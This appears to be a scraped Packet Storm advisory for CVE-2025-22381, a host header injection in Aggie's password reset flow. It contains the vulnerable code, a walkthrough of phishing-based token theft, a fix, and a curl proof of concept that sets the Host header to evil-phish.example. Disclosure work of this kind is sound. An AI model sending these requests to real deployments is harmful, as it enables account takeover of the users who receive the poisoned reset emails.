{“lastseen”:”2026-02-02T18:38:50″,”description”:”This is a detailed analysis and proof of concept exploit for CVE-2025-22381, a host header injection vulnerability discovered in Aggie version 2.6.1…”,”published”:”2026-02-02T00:00:00″,”modified”:”2026-02-02T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Aggie 2.6.1 Host Header Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:214735″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-22381″],”sourceData”:”CVE-2025-22381: Host Header Injection in Aggie\\n \\n Detailed analysis and Proof-of-Concept for CVE-2025-22381, a Host Header Injection vulnerability discovered in the Aggie Open-Source Project.\\n \\n \\n *************************\\n *************************\\n Vulnerability Overview+\\n *************************\\n *************************\\n \\n \\n CVE ID: CVE-2025-22381\\n \\n Published: October 2025 (MITRE assignment)\\n \\n Disclosed publicly: February 2026\\n \\n Reporter: Anas Abderrahman Benbarek\\n \\n Discovery Date: September 17, 2025\\n \\n Affected Project: TID-Lab\/aggie\\n \\n Affected Versions: All versions (including 2.6.1 and earlier; no fix applied as of February 2026)\\n \\n Severity: Medium to High (estimated CVSS ~7.1\u20137.5)\\n \\n Impact: Enables phishing attacks leading to password reset token theft and potential account takeover.\\n \\n \\n *************************\\n *************************\\n Background\\n *************************\\n *************************\\n \\n \\n \\n I spend a fair amount of time reviewing open source node.js projects on GitHub, especially ones that handle authentication flows In September 2025 while looking through the Aggie repository, I noticed something that immediately stood out in the pasword reset logic. What started as routine code reading ended up becoming CVE-2025-22381 \u2014 a classic Host Header Injection vulnerability that allows an attacker to control the domain in pasword reset emails.\\n \\n \\n *************************\\n *************************\\n How I Found It\\n *************************\\n *************************\\n \\n \\n i cloned the repository and started reading files under lib\/api\/, focusing on anything related to authentication and email generation.\\n \\n The file lib\/api\/reset-password.js contains the endpoint logic for \/reset-password. The critical part is inside the sendEmail helper:\\n \\n function sendEmail(user, req, callback) {\\n var token = encodeToken(user);\\n \\n mailer.sendFromTemplate({\\n template: ‘forgotPassword’,\\n user: user,\\n token: token,\\n host: req.headers.host, \/\/ \u2190 vulnerable\\n protocol: req.protocol,\\n acceptLanguage: req.headers[‘accept-language’]\\n }, callback);\\n }\\n \\n \\n The line host: req.headers.host is the problem. In express, req.headers.host comes directly from the Host HTTP header, which is entirely attacker-controlled. There is no validation, no whitelist, no fallback to a trusted domain from configuration.\\n \\n \\n *************************\\n *************************\\n Initial Confirmation\\n *************************\\n *************************\\n \\n \\n I quickly set up a local instance following the README instructions (Ubuntu, nvm, npm install, secrets.json with test SMTP), started the server, and trigered a pasword reset. The generated email link used localhost:3000 as expected.\\n \\n Then I replayed the request with a manipulated Host header:\\n \\n curl -X POST http:\/\/localhost:3000\/reset-password \\\\\\n -H \\”Host: evil-phish.example\\” \\\\\\n -d \\”email=test@victim.com\\”\\n \\n \\n The email (captured via MailHog) contained:\\n http:\/\/evil-phish.example\/reset-password?token=…\\n \\n Proof positive. The application trusts the client-supplied Host header when building the reset link.\\n \\n \\n *************************\\n *************************\\n How the Attack Actually Works\\n *************************\\n *************************\\n \\n \\n \\n Attacker sends a password reset request for a victim s email address, but sets the Host header to a domain they control (e.g. evil-phish.example).\\n \\n Aggie generates a legitimate reset token (server-side, time-limited, encrypted with the config secret).\\n \\n The email is sent containing a link to the attacker s domain instead of the real one.\\n \\n Victim receives the email and clicks the link (phishing success condition).\\n \\n The victim lands on the attacker s server.\\n \\n The attacker s server can:\\n \\n Simply display a fake \u201creset failed\u201d page and silently discard the token, or\\n \\n Capture the token from the query string (via server-side logging or JavaScript), or\\n \\n Proxy the request to the real Aggie instance, capture the token, and forward the user to the legitimate reset page (so the victim doesn t immediately notice anything wrong).\\n \\n Attacker later uses the captured token on the real domain to reset the victim s pasword.\\n \\n The key point: Host header injection alone does not let the attacker use the token directly. The attacker still needs the victim to visit the malicious link so the token reaches the attacker s infrastructure. That s why this is a phishing-enabling vulnerability rather than a direct account takeover without user interaction.\\n \\n \\n *************************\\n *************************\\n Technical Severity \\u0026 Impact\\n *************************\\n *************************\\n \\n \\n This is a medium-to-high severity issue depending on context:\\n \\n AV:N: Network reachable\\n \\n PR:N: No privileges required\\n \\n AC:L: Low complexity\\n \\n UI:R: Requires user interaction\\n \\n S:C: Scope can change (impact extends to the victim\u2019s account on the legitimate domain)\\n \\n C:L \/ I:H: Confidentiality \\u0026 Integrity impact on the victim\u2019s account\\n \\n Many databases list it with CVSS ~7.1\u20137.5 range I personally consider it serious in production environments where Aggie is used for sensitive monitoring (elections, crises), as successful phishing here can lead to full account takeover.\\n \\n \\n \\n *************************\\n *************************\\n Proof-of-Concept (Detailed \\u0026 Reproducible)\\n *************************\\n *************************\\n \\n \\n Environment\\n \\n Ubuntu 18.04\/20.04 (as recommended)\\n \\n Node 12.16 (per .nvmrc)\\n \\n MailHog: Running locally for email capture (docker run -d -p 8025:8025 -p 1025:1025 mailhog\/mailhog)\\n \\n Aggie configured with email.transport pointing to localhost:1025\\n \\n Step-by-step\\n \\n Clone \\u0026 start Aggie:\\n \\n git clone [https:\/\/github.com\/TID-Lab\/aggie.git](https:\/\/github.com\/TID-Lab\/aggie.git)\\n cd aggie\\n nvm install\\n npm install\\n cp config\/secrets.json.example config\/secrets.json\\n edit secrets.json \u2192 set adminPassword, add test SMTP if needed\\n npm start\\n \\n \\n Create a test user via the web UI or directly in MongoDB.\\n \\n Trigger malicious reset:\\n \\n curl -i -X POST http:\/\/localhost:3000\/reset-password \\\\\\n -H \\”Host: evil-phish.example\\” \\\\\\n -H \\”Content-Type: application\/x-www-form-urlencoded\\” \\\\\\n -d \\”email=test@victim.com\\”\\n \\n Open MailHog: Inspect the sent email. The reset link will point to http:\/\/evil-phish.example\/reset-password?token=…\\n \\n \\n *************************\\n *************************\\n Disclosure Timeline\\n *************************\\n *************************\\n \\n Sep 17, 2025: Discovered + local PoC\\n \\n Sep 17, 2025: Emailed mikeb@cc.gatech.edu with full details and PoC\\n \\n Sep 17, 2025: Submitted to MITRE (service request 1926730 \/ MCID15453119)\\n \\n Oct 9, 2025: MITRE assigned CVE-2025-22381\\n \\n Oct\u2013Dec 2025: No public patch or response observed\\n \\n Feb 2026: Public disclosure (this article)\\n \\n \\n *************************\\n *************************\\n Recommended Fix\\n *************************\\n *************************\\n \\n \\n \\n Code Change\\n \\n Replace the vulnerable line with a trusted value in lib\/api\/reset-password.js:\\n \\n \/\/ In lib\/api\/reset-password.js, inside sendEmail()\\n const config = require(‘..\/..\/config\/secrets’).get();\\n \\n \/\/ Option A: Hard trust config value (recommended for single-domain)\\n const host = config.appHost || ‘localhost:3000’;\\n \\n \/\/ Then use it:\\n mailer.sendFromTemplate({\\n template: ‘forgotPassword’,\\n user: user,\\n token: token,\\n host: host, \/\/ Use the trusted variable\\n protocol: config.environment === ‘production’ ? ‘https’ : req.protocol,\\n acceptLanguage: req.headers[‘accept-language’]\\n }, callback);\\n \\n \\n Configuration\\n \\n Add to secrets.json:\\n \\n \\”appHost\\”: \\”[https:\/\/your-real-domain.com](https:\/\/your-real-domain.com)\\”\\n \\n \\n *************************\\n *************************\\n Closing Thoughts\\n *************************\\n *************************\\n \\n \\n host header injection remains surprisingly common in 2025\u20132026 especially in projects that were started years ago and haven\u2019t been heavily audited. Aggie is a valuable tool for civic tech and crisis monitoring \u2014 I hope the maintainers apply a fix soon.\\n \\n If you maintain or use Aggie check your deployment and patch manually until an official release lands. Feel free to reach out if you have questions or want to discuss similar issues in other projects.\\n \\n thanks for reading and stay safe out there.”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214735″,”cvss”:{“score”:8.2,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:L”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214735\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-02T18:38:50″,”description”:”This is a detailed analysis and proof of concept exploit for CVE-2025-22381, a host header injection vulnerability discovered in Aggie version 2.6.1…”,”published”:”2026-02-02T00:00:00″,”modified”:”2026-02-02T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Aggie 2.6.1 Host…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,77,12,15,13,53,7,11,5],"class_list":["post-38573","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-82","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n